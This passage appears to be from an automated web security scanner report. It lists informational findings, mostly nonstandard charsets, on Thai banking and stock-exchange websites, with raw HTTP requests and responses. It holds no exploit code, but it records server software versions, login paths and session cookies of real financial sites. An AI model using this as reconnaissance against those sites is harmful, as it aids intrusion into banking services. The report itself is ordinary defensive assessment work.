
Severity:   Information
Confidence:   Certain
Host:   http://www.kasikornbank.com
Path:   /Pages/truehitsstat.html

Request

GET /Pages/truehitsstat.html?pagename=(en)%20Menu%20Item%20Navigation:%20/EN/Pages/Default.aspx HTTP/1.1
Host: www.kasikornbank.com
Proxy-Connection: keep-alive
Referer: http://www.kasikornbank.com/EN/Pages/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211127951.1304443502.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Kasikorn%20Bank; __utma=211127951.1235232646.1304443502.1304443502.1304443502.1; __utmc=211127951; __utmb=211127951.1.10.1304443502

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Type: text/html
Last-Modified: Tue, 03 May 2011 10:47:15 GMT
ETag: "{1C07B3B6-9458-43A0-8754-31CB185703B4},17908"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
ResourceTag: rt:1C07B3B6-9458-43A0-8754-31CB185703B4@00000017908
Exires: Mon, 18 Apr 2011 12:25:05 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:25:05 GMT
Content-Length: 8648

<script language="javascript1.1">
var page="dummy";

var qsParm = new Array();
function qs() {
var query = window.location.search.substring(1);
var parms = query.split('&');
for (var i=0;
...[SNIP]...

31.35. http://www.ktam.co.th/media_box.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /media_box.php

Request

GET /media_box.php?m=64 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:19 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 538

<OBJECT ID="mediaPlayer" width="205" height="180" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,70
...[SNIP]...

31.36. http://www.mindworkscorp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindworkscorp.com
Path:   /

Request

GET / HTTP/1.1
Host: www.mindworkscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=vt7j68qo3d3q8jfgfpr3ahhvp1; path=/
Content-Type: text/html
Content-Length: 6766


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <title>MindWorks. Corporate Training in Meditation and Stress Management</titl
...[SNIP]...

31.37. http://www.mindworkscorp.com/bio.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindworkscorp.com
Path:   /bio.html

Request

GET /bio.html HTTP/1.1
Host: www.mindworkscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mindworkscorp.com/
Cookie: PHPSESSID=gavq34o9sgpum0ggncioesfte0; __utma=218847493.1214711855.1304447526.1304447526.1304447526.1; __utmb=218847493.1.10.1304447526; __utmc=218847493; __utmz=218847493.1304447526.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:44:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 6724


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <title>MindWorks. Corporate Training in Meditation and Stress Management</titl
...[SNIP]...

31.38. https://www.scb-fx.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scb-fx.com
Path:   /

Request

GET / HTTP/1.1
Host: www.scb-fx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 403 Forbidden
Server: Netscape-Enterprise/6.0
Date: Tue, 03 May 2011 12:44:56 GMT
Content-length: 142
Content-type: text/html

<HTML><HEAD><TITLE>Forbidden</TITLE></HEAD>
<BODY><H1>Forbidden</H1>
Your client is not allowed to access the requested object.
</BODY></HTML>

31.39. https://www.scb-fx.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scb-fx.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.scb-fx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 403 Forbidden
Server: Netscape-Enterprise/6.0
Date: Tue, 03 May 2011 12:45:32 GMT
Content-length: 142
Content-type: text/html

<HTML><HEAD><TITLE>Forbidden</TITLE></HEAD>
<BODY><H1>Forbidden</H1>
Your client is not allowed to access the requested object.
</BODY></HTML>

31.40. http://www.scbbusinessnet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scbbusinessnet.com
Path:   /

Request

GET / HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:43:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 18 Apr 2011 16:22:40 GMT
ETag: "13af-76-cce7f400"
Accept-Ranges: bytes
Content-Length: 118
Content-Type: text/html

<html>
<script>

document.location.href="https://www.scbbusinessnet.com/cs70_banking/logon/sbuser"

</script>
</html>

31.41. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/js/bank-online.html

Request

GET /cs70_banking/js/bank-online.html HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.scbbusinessnet.com/cs70_banking/logon/sbuser
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 12 Jan 2010 03:38:40 GMT
Accept-Ranges: bytes
Content-Length: 397
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

...<ul>
   <li><a href="http://www.scbeasy.com" target="_blank">EASY NET</a></li>
<li><a href="http://www.scbbusinessnet.com" target="_blank">BUSINESS NET</a></li>
   <li><a href="http://www.scb-fx
...[SNIP]...

31.42. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/js/scb-quick-link.html

Request

GET /cs70_banking/js/scb-quick-link.html HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.scbbusinessnet.com/cs70_banking/logon/sbuser
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 23 Jul 2010 15:05:31 GMT
Accept-Ranges: bytes
Content-Length: 1573
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

...<ul>
   <li><a href="http://www.scb.co.th/th/oth/rate.shtml" target="_blank">Interest Rates and Fees</a></li>
<li><a href="http://www.scb.co.th/scb_api/index.jsp" target="_blank">Exchanges Rate
...[SNIP]...

31.43. http://www.scbeasy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scbeasy.com
Path:   /

Request

GET / HTTP/1.1
Host: www.scbeasy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:43:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 264
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBQSACT=OCBGOFPDPGCHHMOONBPIHAOI; path=/
Cache-control: private


                       <script>
                       var cT="t=o";
                       document.cookie=cT;
                       if(document.cookie.indexOf(cT)!=-1){
                       window.top.location.replace('https://www.scbeasy.com/1st_pg.html');
                       }else{
   
...[SNIP]...

31.44. http://www.set.or.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /

Request

GET / HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:04 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 02:29:54 GMT
ETag: "cd18e-308-c7a5cc80"
Accept-Ranges: bytes
Content-Length: 776
Content-Type: text/html

<html>
<head>
<title></title>
<meta http-equiv="Refresh" content="0;URL=/th/index.html">
</head>
<body><!-- BEGIN_START_PAGE_LINK --><BR><a id="StartPageLink" onClick="javascript:StartPageLink();
...[SNIP]...

31.45. http://www.set.or.th/en/contact/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/contact/index.html

Request

GET /en/contact/index.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/products/index/setindex_p1.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:33 GMT
Server: Apache
Last-Modified: Thu, 01 Nov 2007 09:52:34 GMT
ETag: "78001e-86-262bc80"
Accept-Ranges: bytes
Content-Length: 134
Content-Type: text/html

<html>
<head>
<title></title>
<meta http-equiv="Refresh" content="0;URL=/en/contact/contact.html">
</head>
<body></body>
</html>

31.46. http://www.thailandguru.com/thailand-baht-money-transfer-banking-accounts.html#cards/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thailandguru.com
Path:   /thailand-baht-money-transfer-banking-accounts.html#cards/x26amp

Request

GET /thailand-baht-money-transfer-banking-accounts.html#cards/x26amp HTTP/1.1
Host: www.thailandguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:30:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 36872

<HTML><HEAD><TITLE>Thailand Baht, Money Transfers, and Banking Accounts</TITLE>
<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="">
<meta name="date" content="1285927948">
<link
...[SNIP]...

31.47. http://www.zlmc.org/membership.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zlmc.org
Path:   /membership.html

Request

GET /membership.html HTTP/1.1
Host: www.zlmc.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.zlmc.org/
Cookie: e7c4e00d12966c6a9d383111e612e1a5=365b943ca2f1b614f235e4910df6f14c; __utma=1.1018395735.1304447535.1304447535.1304447535.1; __utmb=1.2.10.1304447535; __utmc=1; __utmz=1.1304447535.1.1.utmgclid=CLbmzNHyy6gCFUff4AodPQinqQ|utmccn=(not%20set)|utmcmd=(not%20set)

Response

HTTP/1.1 403 FORBIDDEN
Date: Tue, 03 May 2011 13:44:42 GMT
Server: Apache/2.2.17
X-Powered-By: PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html
Content-Length: 77

<h1>Forbidden access</h1><p><font size="2" color="grey">(Flooding)</font></p>

31.48. http://www22.glam.com/cTagsImg.act  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImg.act

Request

GET /cTagsImg.act HTTP/1.1
Host: www22.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctags=%3bct%3dbarhp; __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utma=234602824.706286063.1303348792.1304359345.1304361407.4; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache
Content-Length: 41
Content-Type: text/html
ETag: "d50d5228dd2483ff2a750361030cb091:1274158213"
X-Glam-Content: image/gif
Cache-Control: max-age=384
Date: Tue, 03 May 2011 13:34:45 GMT
Connection: close

Glam Error: bad request on www22.glam.com

32. HTML uses unrecognised charset  previous  next
There are 118 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


32.1. https://csc.scb.co.th/webclient1/bcm_signin.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://csc.scb.co.th
Path:   /webclient1/bcm_signin.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /webclient1/bcm_signin.jsp?language=en HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:18:36 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=B3C43FADCB6A264B281F22BCE4AD66BD; Path=/webclient1; Secure
Content-Type: text/html;charset=TIS-620


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<head>
<title>SCB BCM Customer Service</title>
<meta name="Keywords" content="csc.scb.co.th, scb.co.th, .......
...[SNIP]...
<meta name="CONTENT OWNER" content="https://csc.scb.co.th">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="./css/style.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.2. https://csc.scb.co.th/webclient1/cllcntr_en.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://csc.scb.co.th
Path:   /webclient1/cllcntr_en.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /webclient1/cllcntr_en.jsp HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:55:39 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=2B76E091D3134A07F2F9324059D9B802; Path=/webclient1; Secure
Content-Type: text/html;charset=TIS-620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Welcome to SCB Call Center</title>
<meta name="Keywords" content="csc.scb.co.th, scb.co.th, ................,
...[SNIP]...
<meta name="CONTENT OWNER" content="https://csc.scb.co.th">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="./css/style.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.3. https://csc.scb.co.th/webclient1/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://csc.scb.co.th
Path:   /webclient1/index.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /webclient1/index.jsp HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:55:46 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=CC747F2754B344B97C30E95EF0643E33; Path=/webclient1; Secure
Content-Type: text/html;charset=TIS-620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Welcome to SCB Call Center</title>
<meta name="Keywords" content="csc.scb.co.th, scb.co.th, ................,
...[SNIP]...
<meta name="CONTENT OWNER" content="https://csc.scb.co.th">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="./css/style.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.4. https://ebank.kasikornbankgroup.com/kbiznet/login.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://ebank.kasikornbankgroup.com
Path:   /kbiznet/login.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /kbiznet/login.html HTTP/1.1
Host: ebank.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:07 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 24 Feb 2011 11:45:06 GMT
ETag: "41d1-7557-bea93480"
Accept-Ranges: bytes
Content-Length: 30039
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerebankgroup_pool=436381888.47873.0000; path=/


<head>
<title>Welcome to K-BizNet</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<style type="text/css">
</style>

<link rel="stylesheet" href="/smestatic/c
...[SNIP]...

32.5. https://eprocurement.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://eprocurement.ktb.co.th
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: eprocurement.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:05 GMT
Last-Modified: Mon, 18 Dec 2006 06:47:36 GMT
ETag: "33858e-268-45863988"
Accept-Ranges: bytes
Content-Length: 616
Connection: close
Content-Type: text/html; charset=windows-874

<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>KRUNG THAI BANK PUBLIC COMPANY LIMITED e-Procurement</titl
...[SNIP]...

32.6. https://ibanking.bangkokbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://ibanking.bangkokbank.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: ibanking.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 153
Content-Type: text/html
Content-Location: https://ibanking.bangkokbank.com/index.html
Last-Modified: Fri, 19 Jun 2009 07:26:26 GMT
Accept-Ranges: bytes
ETag: "03d2a41aff0c91:24ed"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 12:54:49 GMT
Connection: close

<html>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-874">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=./BiB/index.html">
</html>

32.7. https://ibanking.bangkokbank.com/BiB/index.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://ibanking.bangkokbank.com
Path:   /BiB/index.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /BiB/index.html HTTP/1.1
Host: ibanking.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 556
Content-Type: text/html
Last-Modified: Mon, 22 Nov 2010 07:30:52 GMT
Accept-Ranges: bytes
ETag: "05eee30178acb1:24ed"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 12:54:51 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<title>:: Bualuang iBanking ::</title>
<link rel="shortcut icon" href="https://ibanking.bangkokbank.com/BiB/images/ib.ico">
<meta http-equiv="Content-Type" content="text/html; charset=Windows-874">
   <body>
...[SNIP]...

32.8. https://ifunds.bangkokbank.com/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://ifunds.bangkokbank.com
Path:   /Login.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /Login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: ifunds.bangkokbank.com
Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 11188
Content-Type: text/html; charset=windows-874
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=yrla5afsutwfsv45nwjra145; path=/
Date: Tue, 03 May 2011 19:34:32 GMT


<HTML>
   <HEAD>
       <title>Bualuang iFunds</title>
       <META http-equiv="Content-Type" content="text/html; charset=windows-874">
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
...[SNIP]...

32.9. http://marketdata.set.or.th/head-en.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://marketdata.set.or.th
Path:   /head-en.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /head-en.html HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:48 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 10:40:47 GMT
ETag: "618432-107f-803e89c0"
Accept-Ranges: bytes
Content-Length: 4223
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's Capital Market</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

